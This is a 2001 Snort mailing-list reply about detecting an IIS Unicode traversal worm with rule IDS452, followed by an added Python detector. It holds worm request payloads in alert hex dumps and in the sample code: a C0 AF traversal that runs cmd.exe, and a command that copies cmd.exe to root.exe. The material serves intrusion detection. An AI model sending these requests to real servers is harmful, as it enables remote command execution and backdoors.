Snort mailing list archives

Re: sadmind rule


From: Andreas Östling <andreaso () it su se>
Date: Wed, 9 May 2001 22:54:39 +0200 (CEST)

On Wed, 9 May 2001, Andrew Daviel wrote:

> On Wed, 9 May 2001, Max Vision wrote:
>
> > The NT/IIS attacks will be seen by IDS433:
> >  http://whitehats.com/info/IDS433  (http-iis-unicode-traversal-optyx)
>
> Not if the HTTP preprocessor is enabled - which for me gives
> way too many "spp_http_decode: IIS Unicode attack detected " to
> believe.
>
> The IDS433 rule doesn't seem to be in the ruleset I was running (Jan 18
> 2001 probably) or in the "current" 1.7 snortrules.tar.gz I just
> downloaded.


IDS452/http-iis-unicode-binary has done the job for me (catching the new
worm).

[**] IDS452/http-iis-unicode-binary [**]
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E C0  GET /scripts/...
AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D  .../winnt/system
33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69  32/cmd.exe?/c+di
72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A        r HTTP/1.0....

[**] IDS452/http-iis-unicode-binary [**]
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E C0  GET /scripts/...
AF 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D  .../winnt/system
33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 63 6F  32/cmd.exe?/c+co
70 79 2B 5C 77 69 6E 6E 74 5C 73 79 73 74 65 6D  py+\winnt\system
33 32 5C 63 6D 64 2E 65 78 65 2B 72 6F 6F 74 2E  32\cmd.exe+root.
65 78 65 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A  exe HTTP/1.0....


Regards,
Andreas Östling


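The two IDS452 alerts above are caught on the raw bytes C0 AF, the overlong two-byte UTF-8 encoding of "/" that IIS decoded as a path separator. As an added example (not code from the post, its authors, or the Snort project), the following Python detector does what the thread contrasts: it decodes the request path the way the HTTP preprocessor does (percent-encoding first, then overlong separators) and then only flags the narrow condition that matters here, "../" traversal reaching cmd.exe, rather than every decoded Unicode sequence. The payloads are transcribed from the hex dumps in the message; the third, percent-encoded variant, the function names and the overlong-sequence table are this example's own.

```python
# Added example: decode-then-match detection for the IIS Unicode traversal
# shown in the IDS452 alerts. Not from the mailing list post or from Snort.
import re
from urllib.parse import unquote_to_bytes

# Overlong two-byte UTF-8 encodings of '/' (0x2F) and '\' (0x5C). A strict
# UTF-8 decoder rejects them; the vulnerable IIS accepted them, so C0 AF in a
# path behaves like a slash while a byte-for-byte "../" check never sees one.
OVERLONG_SEPARATORS = {
    b"\xc0\xaf": b"/",
    b"\xc1\x9c": b"\\",
}

# Sample payloads. The first two are transcribed from the alert hex dumps in
# the message above; the third is a constructed percent-encoded variant.
WORM_DIR = (b"GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir"
            b" HTTP/1.0\r\n\r\n")
WORM_COPY = (b"GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+copy+"
             b"\\winnt\\system32\\cmd.exe+root.exe HTTP/1.0\r\n\r\n")
PERCENT_VARIANT = (b"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir"
                   b" HTTP/1.0\r\n\r\n")
BENIGN = b"GET /scripts/index.asp?id=1 HTTP/1.0\r\n\r\n"


def normalize_path_bytes(raw: bytes) -> bytes:
    """Decode %XX escapes, then map overlong separators to their 1-byte form.

    This mirrors what a decoding preprocessor produces before rules run.
    """
    out = unquote_to_bytes(raw)
    for seq, plain in OVERLONG_SEPARATORS.items():
        out = out.replace(seq, plain)
    return out


def request_path(payload: bytes) -> bytes:
    """Return the request-target from the first line of an HTTP request."""
    line = payload.split(b"\r\n", 1)[0]
    parts = line.split(b" ")
    return parts[1] if len(parts) >= 2 else b""


def analyze_request(payload: bytes) -> dict:
    """Classify one HTTP request payload.

    overlong_encoding: an overlong separator was present (raw or %-encoded)
    traversal:         the decoded path contains "../" or "..\\"
    cmd_exe:           the decoded path reaches cmd.exe
    alert:             True only for traversal that reaches cmd.exe, which is
                       the narrow condition the thread cares about
    """
    raw = request_path(payload)
    decoded_once = unquote_to_bytes(raw)
    has_overlong = any(seq in decoded_once for seq in OVERLONG_SEPARATORS)
    norm = normalize_path_bytes(raw)
    traversal = re.search(rb"\.\.[/\\]", norm) is not None
    cmd = b"cmd.exe" in norm.lower()
    return {
        "overlong_encoding": has_overlong,
        "traversal": traversal,
        "cmd_exe": cmd,
        "alert": traversal and cmd,
        "normalized_path": norm.decode("latin-1"),
    }


if __name__ == "__main__":
    for name, payload in [("dir", WORM_DIR), ("copy", WORM_COPY),
                          ("percent", PERCENT_VARIANT), ("benign", BENIGN)]:
        print(name, analyze_request(payload))
```

Matching on the raw C0 AF bytes, as IDS452 does, is cheap and precise but misses the percent-encoded spelling; decoding first catches both, and the extra "reaches cmd.exe" condition is what keeps the decoded check from producing the flood of generic spp_http_decode alerts Andrew describes.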